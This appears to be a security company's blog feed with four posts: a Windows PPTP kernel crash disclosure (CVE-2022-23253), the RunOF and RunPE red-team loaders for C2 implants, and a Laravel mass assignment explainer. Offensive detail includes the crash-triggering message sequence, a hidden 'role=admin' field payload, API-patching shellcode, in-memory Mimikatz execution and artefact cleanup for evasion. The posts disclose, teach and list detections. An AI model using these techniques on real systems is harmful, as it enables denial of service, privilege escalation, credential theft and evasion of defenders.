PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and VPN server. The protocol has two parts, a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for the configuring of buffering and multiplexing for network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest has no effect on the test case and just needs to be validly formed in order for the server to progress the connection state into being able to process the rest of the defined control connection frames. If you’re interested in what all these control packet frames are supposed to do or contain you can find details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).

PPTP IncomingCall Setup Procedure

In order to forward some network data to a PPTP VPN server the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server, these are outgoing calls and incoming calls. To to communicate with a VPN server from a client we typically use the incoming call variety. Finally, to set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up call ID’s for tracking the call (these ID’s are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important bit of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up data can then be sent to the GRE part of the PPTP connection using the call ID to identify the virtual call connection it belongs to.

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

The test case appears to initially be very simple and actually mostly resembles what we would expect for a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered causing a system crash to occur.

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What’s interesting here is that we can see that the crash does not not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys in what is referred to as a mini-port driver, which means that it only actually implements a small part of the functionality required to implement an entire VPN interface and the rest of the VPN handling is actually performed by the NDIS driver system. raspptp.sys acts as a front end parser for PPTP which then forwards on the encapsulated virtual network frames to NDIS to be routed and handled by the rest of the Windows VPN back-end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exists on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
            // Get the context structure for this call ID if it exists
            IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
            // Handle the incoming call connected event
            if ( IncomingCallCallCtx )
                CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);

The CallEventCallInConnect function performs two tasks; it activates the virtual call connection through a call to NdisMCmActivateVc and then if the returned status from that function is not STATUS_PENDING it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
if ( ActiveateVcRetCode != STATUS_PENDING )
{
    if...
        PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;
        *(_QWORD *)(v2 + 136) = v6;
        *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
        KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality, the NdisMCMActivateVc function is surprisingly simple. We know that it always returns 0 so there will always be a proceeding call to PptpCmActivateVcComplete by the CallEventCallInConnect function.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn’t sit in our main target driver, raspptp.sys, it’s mostly un-reverse engineered, but it’s pretty clear to see that the main purpose is to set some properties on a structure which is tracked as the handle to NDIS from raspptp.sys. Since this doesn’t really seem like it’s directly causing the issue we can safely ignore it for now. The particular variable lpCallParameters (also the CallParameters argument) is causing the null pointer dereference and is passed into the function by raspptp.sys; this indicates that the vulnerability must be occurring somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect we know that the CallParmaters argument is actually a pointer stored within the Call Context structure in raspptp.sys. We can assume that at some point in the call to PptpCmActivateVcComplete this structure is freed and the pointer member of the structure is set to zero. So lets find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
if ( lpCallContext->UnkownFlag )
{
    if ( lpCallParams )
        ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);
        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible sections of code. From reverse engineering the setup of the CallContext structure we know that the UnkownFlag structure variable is set to 1 by the handling of the IncomingCallRequest frame where the CallContext structure is initially allocated and setup. For our test case this code will always execute and thus the second call to CallEventCallInConnect will trigger a null pointer dereference and crash the machine in the NDIS layer, causing the appropriate Blue Screen Of Death to appear:

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported To Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

The post CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference appeared first on Nettitude Labs.

Introducing RunOF – Arbitrary BOF tool

2 March 2022 at 20:26

A few years ago, a new feature was added to Cobalt Strike called “Beacon Object Files” (BOFs). These provide a way to extend a beacon agent post-exploitation with new features, perhaps to respond to conditions that you find after exploring an environment. Since then, the community has created many BOFs to cover many common scenarios, and we’ve been leveraging some of them to more closely emulate adversary actions on objectives.

github GitHub: https://github.com/nettitude/RunOF

While doing this we’ve wanted to have a way to help us more easily debug and test our own BOFs, as well as use them across all the tooling we use. Therefore, we’re introducing RunOF – a tool that allows you to run BOFs outside of the Cobalt agent, as well as within PoshC2.

What is RunOF?

The aim of this project is to create a .NET application that is able to load arbitrary BOFs, pass arguments to them, execute them and collect and return any output. Additionally, the .NET application should be able to run within C2 frameworks, such as PoshC2.

The overall process is broadly similar to that used by the RunPE tool that we recently released, and so the RunOF tool uses some of the same techniques. The high-level process is as follows:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Cleanup memory artifacts before exiting

How RunOF works

The first step in developing RunOF was to understand in detail what Beacon Object Files are. To do this, we looked at the publicly available documentation, and some of the example BOFs produced by the community.

A BOF contains an exported routine (typically a function called ‘go’ – but it can be anything you like), as well as calls to routines such as BeaconPrintf to return data back to the agent. There is also a convention that allows access to the Windows API by calling a function of the form DLL_name$function_name – e.g. kernel32$VirtualAlloc.

BOFs are, as the name suggests, “object” files, with some specifications for how symbols should be imported so the beacon loader can resolve them dynamically. An object file is something you are most likely to have encountered as an intermediary file when compiling code, typically with a .o extension. When you are developing a C application for example, there are actually multiple steps happening – often abstracted by the Makefile or other build system that you are using. The first are preprocessing and compilation; these are taking the human-readable code, dealing with #defines and #includes before converting it into machine code that can be executed by processor. The second is linking: this step takes all the outputs of the previous step and resolves any references between them, before constructing an executable file that allows the operating system to load and execute the binary.

Compilation Process

The object file is the output from the first preprocessing and compilation stage, so it contains unlinked relocatable machine code, along with debugging and other metadata. On Windows (which we’re targeting with RunOF) object files use the Common Object File Format (COFF) which Microsoft documents as part of the PE format (https://docs.microsoft.com/en-us/windows/win32/debug/pe-format).

A COFF file is made up of a collection of headers containing information about the file itself, symbol and string tables, and then a collection of sections that contain the code to be executed, data it needs and information on how to load that data into memory.

Object File Layout

What each section is for is a little out of scope for this article, but the key ones we need to use are:

  • .text: This contains the machine code to be executed.
  • .data: Storage for initialized static variables.
  • .bss: Storage for uninitialized static variables.
  • .rdata: Storage for read-only initialized variables (e.g. constants).
  • .reloc: Information on which bits of the file need to be updated when the load address is known.

As well as sections, an important part of the file we need to parse is the symbol table. This gives the location in the file of functions we have implemented, as well as functions we are expecting to import from other DLLs.

Example Symbol Table

For example, in the screenshot above, we can see the go symbol is located in ‘SECT1’ (which is the .text section), whereas the symbols such as __imp_BeaconPrintf are ‘UNDEF’ which means we need to provide them. Normally this would be done by the linker as part of the overall build process we outlined above, but we will have to do that step in our loader.

The loading process follows the following high level steps:

Loading Process

The most complex part of the process is probably resolving the relocation entries. When the code is compiled the compiler doesn’t know where in memory items (such as functions, variables or data) will be located when the application runs – the values could be in other object files, or need to be loaded from an Operating System API. Therefore, the compiler has a set of architecture specific-rules to choose from that allow it to specify that the address needs to be ‘filled in’ at linking time.

There is a small subset in the diagram above, the full list is quite large. Many appear to not be used in practice (and, for example, tools like Ghidra don’t support them) so we’ve only implemented the ones seen in the most common compilers. A relocation entry has, in effect, three fields – the symbol the relocation references, the address the relocation is to be applied to and the relocation type. As an example, the last one in the list (IMAGE_REL_AMD64_REL32) means the loader has to find the address of the referenced symbol, calculate a 32-bit relative address from the relocation location to that symbol and write the value to the relocation address.

Once the relocations have been applied, memory permissions set correctly and the entry point located the BOF can be executed.

Getting it done with .NET

We wanted this to run in .NET to give us greater flexibility in how we use it as part of our other C2 tooling. This poses a challenge, since .NET is an interpreted language and so the code we write will be running inside the Common Language Runtime (CLR). Fortunately, .NET provides functionality for working with unmanaged code called Interop that allows us to manipulate native memory to load the BOF and then call a native Windows API function to execute it. We use the same technique as developed for RunPE of launching the code in a new thread, and we install an exception handler to prevent any buggy BOFs from crashing the entire process.

Another challenge we faced was in getting any output produced by the BOF back to the .NET parent application so it could be returned down a C2 channel. The Cobalt agent defined a set of Beacon* functions (e.g. BeaconPrintf) that the BOF can call to pass data back to the implant. These need to be implemented as native code for the BOF to be able to call them, and we need to have a way of passing the data they produce between the native code and the .NET parent. To implement this, we have a small ‘beacon_functions’ COFF file that is loaded by the .NET loader first. This contains implementations of the Beacon*functions that write their output into a buffer that is grown to contain the data output by the BOF. When the actual BOF is loaded the addresses of the already loaded Beacon* functions can then be provided during the symbol resolution step. Once BOF execution completes the .NET parent can read from the memory buffer to retrieve any output generated.

The final piece of the puzzle is how we provide arguments to the BOF file. In Cobalt, BOFs are loaded with an ‘aggressor’ script that allows you to pass arguments of differing types to the BOF file, where they are retrieved by using the data API defined in beacon.h:

Data API Definition

To allow BOFs to accept arguments in RunOF we have to accept them on the command line of our application, then provide them in a way that can be consumed by the native code once it is loaded. To do this, we serialize them into a shared memory buffer using a custom type, length, value (TLV) format. Our internal implementation of the data API can then read from that buffer when invoked by the BOF:

Argument Serialisation

There are two important caveats to this approach:

  • The arguments must be provided on the command line in the order the BOF is expecting to receive them. You can get this from the aggressor script used to load the BOF, or from looking at the BOF code.
  • The arguments must be provided with the correct type (e.g. Int/Short etc.). Again, this can usually be seen from the aggressor script. In some cases, the aggressor script may itself do some parsing (e.g. converting a DNS lookup type such as A or AAAA into a numeric code for the BOF’s internal use) – in which case you have to provide the internal code.

You can see a lot more detail on this in the project README, and the command line help offers a summary:

Command Line Help

Debug Capability

As well as running BOFs, the RunOF project can also be used to help develop new BOF capability. The project files contain a ‘Debug’ build target – if this is used then the loader will pause before executing the BOF to allow a debugger to be attached. You’ll also get lots of information about the loading process itself.

Conclusion

We hope that RunOF gives Red Teamers a way to use existing BOF functionality in other C2 frameworks, and to help develop new and innovative BOF capability. The RunOF project can be found at the link below.

github GitHub: https://github.com/nettitude/RunOF

The post Introducing RunOF – Arbitrary BOF tool appeared first on Nettitude Labs.

Explaining Mass Assignment Vulnerabilities

By: Dom Myers
25 January 2022 at 09:00

Programming frameworks have gained popularity due to their ability to make software development easier than using the underlying language alone. However, when developers don’t fully understand how framework functionality can be abused by attackers, vulnerabilities are often introduced.

One commonly used framework feature is known as mass assignment, a technique designed to help match front end variables to their back end fields, for easy model updating.

Implementing mass assignment

We’ll be using PHP/Laravel as an example to demonstrate how mass assignment works via the Laravel framework. Let’s imagine you have a form which allows a user to update some of their profile details, and that form contains the following fields:

<form method="POST" action="/updateuser">
    <input type="text" name="name" />
    <input type="text" name="email" />
    <input type="text" name="address" />
    <input type="text" name="phone" />
    <button type="submit">Signup</button>
</form>

Within the Laravel controller, one way to update those fields would be as follows:

public function updateUser(Request $request)
{
    $user = Auth::user();
    $user->name = $request->post('name');
    $user->email = $request->post('email');
    $user->address = $request->post('address');
    $user->phone = $request->post('phone');
    $user->save();
}

An alternative way to do this would be to take advantage of mass assignment, which would look something like this:

public function updateUser(Request $request)
{
    $user = Auth::user();
    $user->update($request->all());
}

This code updates the User model with the values from the Request (in this case the HTML fields for name, email, address and phone) assuming that the input names match the models fields. This obviously saves superfluous lines of code, since all fields can be updated at once, instead of specifying individually.

The mass assignment vulnerability

So, how might an attacker exploit this?

As may be evident from the code above, the framework is taking all the input fields from the Request variable and updating the model without performing any kind of validation. Therefore, its trusting that all the fields provided are intended to be updateable.

Although the example currently only provides options for updating fields such as name and email, there are usually more columns in the User table which aren’t displayed on the front end. In this case, lets imagine that there is also a field named role, which determines the privilege of the user. The role field wasn’t displayed in the HTML form because the developers didn’t want users changing their own role.

However, with our understanding that the controller is simply trusting all input provided by the request to update the User model, an attacker can inject their own HTML into the page to add a field for role, simply by using built in browser tools. This can also be done by intercepting the request using a proxy and appending the field name and value, or by any other technique that allows client side modification.

<form method="POST" action="/updateuser">
    <input type="hidden" name="role" value="admin">
    <input type="text" name="name" />
    <input type="text" name="email" />
    <input type="text" name="address" />
    <input type="text" name="phone" />
    <button type="submit">Signup</button>
</form>

This time, when the controller is reached, the user model will be updated with the expected fields (name, email, address, phone) as well as the additional role field provided.  In this case, the vulnerability leads to privilege escalation.

This particular example demonstrates how mass assignment can be exploited to achieve privilege escalation, however it is often possible to bypass other controls using the same technique. For example, an application might prevent a username from being edited when updating profile information, to ensure integrity and accountability across audit trails. Using this attack, a user could perform malicious actions under the guise of one username before switching to another.

Countermeasures

There are several ways to protect against mass assignment attacks. Most frameworks provide defensive techniques such as those discussed in this section.

The general idea is to validate input before updating the model. The safest way to do this is to somewhat fall back to the original and more convoluted process of specifying each field individually. This also has the added benefit of providing the ability to add additional validation to each field beyond ensuring only expected fields are updated.

In Laravel, one way to do this would be as shown below; include some validation such as the maximum number of permissible characters for the name field, and then update the User model with the validated data. As the validate() function lists the exact fields expected, if the role field was appended as demonstrated in our previous sample attack, it would be ignored and have no effect.

public function updateUser(Request $request)
{
    $validatedData = $request->validate([
        'name' => ['required', 'max:255'],
        'email' => ['required', 'unique:users'],
        'address' => ['required'],
        'phone' => ['numeric']
    ]);
    $user = Auth::user();
    $user->update($validatedData);
}

An alternative method is to utilize allow lists and deny lists to explicitly state what fields can and cannot be mass assigned. In Laravel, this can be done by setting the $fillable property on the User model to state which fields may be updated in this way. The code below lists the four original fields from the HTML form, so if an attacker tried to append the role field, since its not in the $fillable allow list, it won’t be updated.

class User extends Model
{
    protected $fillable = [
        'name',
        'email',
        'address',
        'phone'
    ];
}

Similarly, deny lists can be used to specify which fields cannot be updated via mass assignment. In Laravel, this can be done using the $guarded property in the model instead. Using the following code would have the same effect as the above, since the role parameter has been deny listed.

class User extends Model
{
    protected $guarded = ['role'];
}

Conclusion

Mass assignment vulnerabilities are important issues to check for during software development and during penetration tests because they are often not picked up by automated tools, due to them often having a logic component. For example, a tool will not likely have the context to understand if a user has managed to escalate their privilege after a specially crafted request.

They are also often overlooked by developers, partly due to lack of awareness for how certain features can be exploited, but also due to pressure to complete projects since its faster to use mass assignment without performing input validation.

It’s important to understand that mass assignment vulnerabilities exist and can be exploited with high impact. A strong software development lifecycle and associated testing regime will reduce the likelihood of these vulnerabilities appearing in code.

The post Explaining Mass Assignment Vulnerabilities appeared first on Nettitude Labs.

Introducing Process Hiving & RunPE

By: Rob Bone
2 September 2021 at 09:00
Process Hiving Cover 2

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

High quality red team operations are research-led. Being able to simulate current and emerging threats at an accurate level is of paramount importance if the engagement is going to provide value to clients.

One common use case for offensive operations is the requirement to run native executable files or compiled code on the target and in memory. Loading and running these files in memory is not a new technique, but running executables as secondary modules within a Command & Control (C2) framework is rarer, particularly those that support arguments from the host process.

This blog introduces innovative techniques and is a must have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime, including capturing any output, before cleaning up and restoring memory to hide any trace that it was run.

What is it?

The aim of this project is to develop a .NET assembly that provides a mechanism for running arbitrary unmanaged executables in memory. It should allow arguments to be provided, load any libraries that are required by the code, obtain any STDOUT and STDERR from the process execution, and not terminate the host process once the execution of the loaded PE finishes.

This .NET assembly must be able to be run in the normal way in C2 frameworks, such as by execute-assembly in Cobalt Strike or run-exe in PoshC2, in order to extend the functionality of those frameworks.

Finally, as this is to all take place in an implant process, any artefacts in memory should then be cleaned up by zeroing out the memory and removing them or restoring original values in order to better hide the activity.

We’re calling this technique of running multiple PEs from the within the same process ‘Process Hiving’ and the result of this work is the .NET assembly RunPE. In essence this technique:

  • Receives a file path or base64 blob of a PE to run
  • Manually maps that file into memory without using the Windows Loader in the host process
  • Loads any dependencies required by the target PE
  • Patches memory to provide arguments to the target PE when it is run
  • Patches various API calls to allow the target PE to run correctly
  • Replaces the file descriptors in use to capture output
  • Patches various API calls to prevent the host process from exiting when the PE finishes executing
  • Runs the target PE from within the host process, while maintaining host process functionality
  • Restores memory, unloads dependencies, removes patches and cleans up artefacts in memory after executing

Loading the PE

The starting point for the work was @subtee‘s .NET PE Loader utilised in GhostPack’s SafetyKatz. This .NET PE Loader already mapped a PE into memory manually and invoked the entry point, however a few issues remained preventing its use it in an implant process. SafetyKatz uses a ‘slightly modified’ version of Mimikatz as the target PE, critically to not require arguments or exit the process upon completion.

The first step then was to re-use as much of this work as possible and rewrite it to suit our needs – no need to reinvent the wheel when a lot of great work was already done. The modified loader manually maps the target PE into memory, performs any fixups and then loads any dependency DLLs that are not already loaded. The Import Address Table for the PE is patched with the locations of all the libraries once they are loaded, mimicking the real Windows loader.

Patching Arguments

In a Windows process a pointer to the command line arguments is located in the Process Environment Block (PEB) and can be retrieved directly or, more commonly, using the Windows API call GetCommandLine. Similarly, the current image name is also stored in the PEB. With RunPE, the command line and image name are backed-up for when we reset during the clean-up phase and then replaced with the new values for the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 8.png

Preventing Process Exit

Another issue with running vanilla PEs in this way is that when they finish executing the PE inevitably tries to exit the process, such as by calling TerminateProcess.

Similarly, as the RunPE process is .NET, the CLR also tries to shut down once process termination is initiated, so even if TerminateProcess is prevented CorExitProcess will cause any .NET implant to exit.

To circumvent this a number of these API calls are patched to instead jmp to ExitThread. As the entry point of the target PE is to be run in a new thread this means that once it has finished it will gracefully exit the thread only, leaving the process and CLR instead.

These API calls are patched with bytes that use Return Oriented Programming (ROP) to instead call ExitThread, passing an exit code of 0.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 12.png

An example of this patch if the ExitThread function was located at 0x1337133713371337 is below:

0: 48 c7 c1 00 00 00 00 mov rcx, 0x0 // Move 0 into rcx for exit code argument
7: 48 b8 37 13 37 13 37 movabs rax, 0x1337133713371337 // Move address of ExitThread into rax
e: 13 37 13
11: 50 push rax // Push rax onto stack and ret, so this value with be the 'return address'
12: c3 ret

We can see this in x64dbg while RunPE is running, viewing the NtTerminateProcess function and noting it has been patched to exit the thread instead.

Fixing APIs

Several other API calls also required patching with new values in order for PEs to work. One example is GetModuleHandle which, if called with a NULL parameter, returns a handle to the base of the main module. When a PE calls this function it is expecting to receive its base address, however in this scenario the API call will in fact return the host process’ binary’s base address, which could cause the whole process to crash, depending on how that address is then used.

However, GetModuleHandle could also be called with a non-NULL value, in which case the base address of a different module will be returned.

GetModuleHandle is therefore hooked and execution jumps to a newly allocated area of memory that performs some simple logic; returning the base address of the mapped PE if the argument is NULL and rerouting back to the original GetModuleHandle function if not. As the first few bytes of GetModuleHandle get overwritten with a jump to our hook these instructions must be executed in the hook before jumping back to the GetModuleHandle function, return execution to after the hook jump.

As with the previous API patches, these bytes must be dynamically built-in order to provide the runtime addresses of the hook location, the GetModuleHandle function and the base address of the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 15.png

As an additional change the PEB is also updated, replacing the base address with that of the target PE so that if any programs retrieve this address from the PEB directly then they get the expected value.

At this point, the target PE should be in a position to be able to run from within the host process by calling the entry point of the PE directly. However, as the intended use case is to be able to use RunPE to execute PEs in memory from with an implant, it is a requirement to be able to capture output from the program.

Capturing Output

Output is captured from the target process by replacing the handles to STDOUT and STDERR with handles to anonymous pipes using SetStdHandle.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 18.png

Just before the target PE entry point is invoked on a new thread, an additional thread is first created that will read from these pipes until they are closed. In this way, the output is captured and can be returned from RunPE. The pipes are closed by RunPE after the target PE has finished executing, ensuring that all output is captured.

Clean Up

As Process Hiving includes running multiple processes from within one, long-running host process it is important that any execution of these ‘sub’ processes includes full and proper clean up. This serves two purposes:

  • To restore any changed state and functionality in order to ensure that the host process can continue to operate normally.
  • To remove any artefacts from memory that may cause an alert or artifact if detected through techniques such as in-memory scanning or aid an investigator in the event of a manual triage.

To achieve this, any code change made by RunPE is stored during execution and restored once execution is complete. This includes API hooks, changed values in memory, file descriptors, loaded modules and of course the mapped PE itself. In the case of any particularly sensitive values, such as the command line arguments and mapped PE, the memory region is first zeroed out before it is freed.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 20.png

Demonstration

An example of RunPE running unchanged and up-to-date Mimikatz is below, alongside Procmon process activity events for the process.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 21.png

Note that there are no sub-processes created, and Mimikatz runs successfully with the provided arguments.

Running a debug build provides more output and allows us to verify that the artefacts are being removed from memory and hooks removed, etc. We can see below that after the clean-up has occurred the ‘new’ DLLs loaded for Mimikatz have either already been cleaned up by Mimikatz itself (the error code 126) or are freed by RunPE and are now no longer visible in the Modules tab of Process Hacker.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 22.png

Similarly, the original code on the hooks such as NtTerminateProcess has been restored, which we can verify using a debugger such as x64dbg as below.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 23.png

As during Red Team operations Mimikatz.exe is unlikely to exist in the target environment, RunPE also supports loading of binaries from base64 blobs so that they can be passed with arguments down C2 channels. Long, triple dash switches are used in order to avoid conflicts with any arguments to the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 24.png

An example of this from a PoshC2 implant below demonstrates the original use case. The implant host process of netsh.exe loads and invokes the RunPE .NET assembly which in turn loads and runs net.exe in the host process with arguments. In this case net.exe is passed as a base64 blob down C2.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 25.png

Known Issues & Further Work

There are a number of known issues and caveats with this work in its current state which are detailed below.

  • RunPE only supports x64 bit native Windows PE files.
  • During testing any modern PE compiled by the testers has worked without issues, however issues remain with a number of older Windows binaries such as ipconfig.exe and icacls.exe. Further research is presently ongoing into what specific characteristics of these files cause issues.
  • If the target PE spawns sub-processes itself then those are not subject to Process Hiving and will be performed in the normal fashion. It is up to the operator to understand what the behaviour of the target PE is any other considerations that should be made.
  • RunPE presently calls the entry point of the target PE on a new thread and waits for that thread to finish, with a timeout. If the timeout is reached or if the target PE manipulates that thread, this is undefined behaviour.
  • PEs compiled without ASLR support do not work currently, such as by mingw.

Additionally, further work can be made on RunPE to improve the stealth of the Process Hiving technique:

  • Dependencies of the target PE can be mapped into memory using the same PE loader as the target PE itself and not using the standard Windows Loader. This would bypass detections on API calls such as LoadLibrary and GetProcAddress as well as any hooks placed in those modules by defensive software.
  • For any native API calls that remain, the use of syscalls directly can be explored to achieve the same ends for the same reasons as described above.

Detections

For Blue Team members, the best way to prevent this technique is to prevent the attacker from reaching this stage in the kill chain. Delivery and initial execution for example likely provide more options for detecting an attack than process self-manipulation. However, a number of the actions taken by RunPE can be explored as detections.

  • SetStdHandle is called six times per RunPE call, once to set STDOUT, STDERR and STDIN to handles to anonymous pipes and then again to reset them. A cursory monitor of a number and range of processes on the author’s own machine did not show any invocations of this API call as part of standard use, so this activity could potentially be used to detect RunPE.
  • A number of APIs are hooked or modified and then restored as part of every RunPE run such as GetCommandLine, NtTerminateProcess, CorExitProcess, RtlExitUserProcess, GetModuleHandle and TerminateProcess. Continued modification of these Windows API calls in memory is not likely to be common behaviour and a potential avenue to detection.
  • Similarly, the PEB is also continually modified as the command line string and image name are updated with every invocation of RunPE.
  • While the source code can be obfuscated, any attempt to load the default RunPE assembly into a .NET process provides a strong opportunity for detection.

Conclusion

At its core, Process Hiving is a fairly simple process. A PE is manually mapped into memory using existing techniques and a number of changes are made to API calls and the environment so that when the entry point of that PE is invoked it runs in the expected way.

We hope that this technique and the tool that implements it will allow Red Teams to be able to quickly and easily run native binaries from their implant processes without having to deal with many of the pain points that plague similar techniques that already exist.

The source code for RunPE is available at https://github.com/nettitude/RunPE and any further work on the tool can be found there. Contributions and collaboration are also welcome.

Process Hiving Cover 2

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

The post Introducing Process Hiving & RunPE appeared first on Nettitude Labs.

❌
❌